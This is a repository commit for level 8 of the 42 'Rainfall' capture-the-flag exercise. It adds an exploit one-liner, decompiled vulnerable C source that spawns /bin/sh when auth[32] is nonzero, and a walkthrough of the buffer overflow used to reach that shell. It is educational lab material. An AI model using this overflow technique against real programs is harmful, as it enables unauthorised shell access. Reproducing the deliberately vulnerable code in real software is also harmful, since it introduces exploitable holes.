starnakin/42_rainfall
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

level8: done

Browse Source
This commit is contained in:
0x35c 2025-05-02 17:14:49 +02:00
parent a8ff8f0105
commit 50afa069df
3 changed files with 50 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
level8/ressources/exploit Normal file
View File

@ -0,0 +1 @@
(python -c 'print "auth \nservice" + "A" * 34 + "\n" + "login\n"'; cat) | ./level8

36
level8/source.c Normal file
View File

@ -0,0 +1,36 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char *auth;
int service;
int main(void)
{
char s[5];
char v5[2];
char v6[129];
while (1) {
printf("%p, %p \n", auth, (const void *)service);
if (!fgets(s, 128, stdin))
break;
if (!memcmp(s, "auth ", 5)) {
auth = (char *)malloc(4);
auth[0] = 0;
if (strlen(v5) <= 30)
strcpy(auth, v5);
}
if (!memcmp(s, "reset", 5))
free(auth);
if (!memcmp(s, "service", 6))
service = (int)strdup(v6);
if (!memcmp(s, "login", 5)) {
if (auth[32])
system("/bin/sh");
else
fwrite("Password:\n", 1, 10, stdout);
}
}
return 0;
}

13
level8/walkthrough Normal file
View File

@ -0,0 +1,13 @@
# Level8
Using ghidra, we can decompile the code and see that it loops on a `fgets()` and does a bunch of `memcmp()` with its buffer.
First of all, we have 2 global variables, `char *auth` and `int service`. Also, we have 3 local buffers (`s`, `v5` and `v6`) with respective sizes of 5, 2 and 129.
We can see that they are being changed in 2 different `if memcmp()`.
The first one is when we input `"auth "`. It will allocate 4 bytes to `auth`, then set `auth[0]` to 0.
The second one is when we input `"service"`. It will `strdup()` the content of `v6` (a random buffer on the stack) to `service`. This is interesting because we can overflow the first buffer `s` (through `fgets(s, 128, stdin)`)until we reach `v6`, thus allowing us to write whatever we want to service. Since `service` is an int, it will overflow to the next variable, which is `char *auth`.
To make this vulnerability useful, let's see the last `memcmp()`.
This last `if memcmp()` is triggered with the input `"login"`. It then has an `if/else`, that will open a shell (what we want) in case `auth[32] != 0`.
Here comes the interesting part, remember we could overflow on `auth` through the `strdup` on `service`.
Here's the full exploit:
`(python -c 'print "auth \nservice" + "A" * 34 + "\n" + "login\n"'; cat) | ./level8`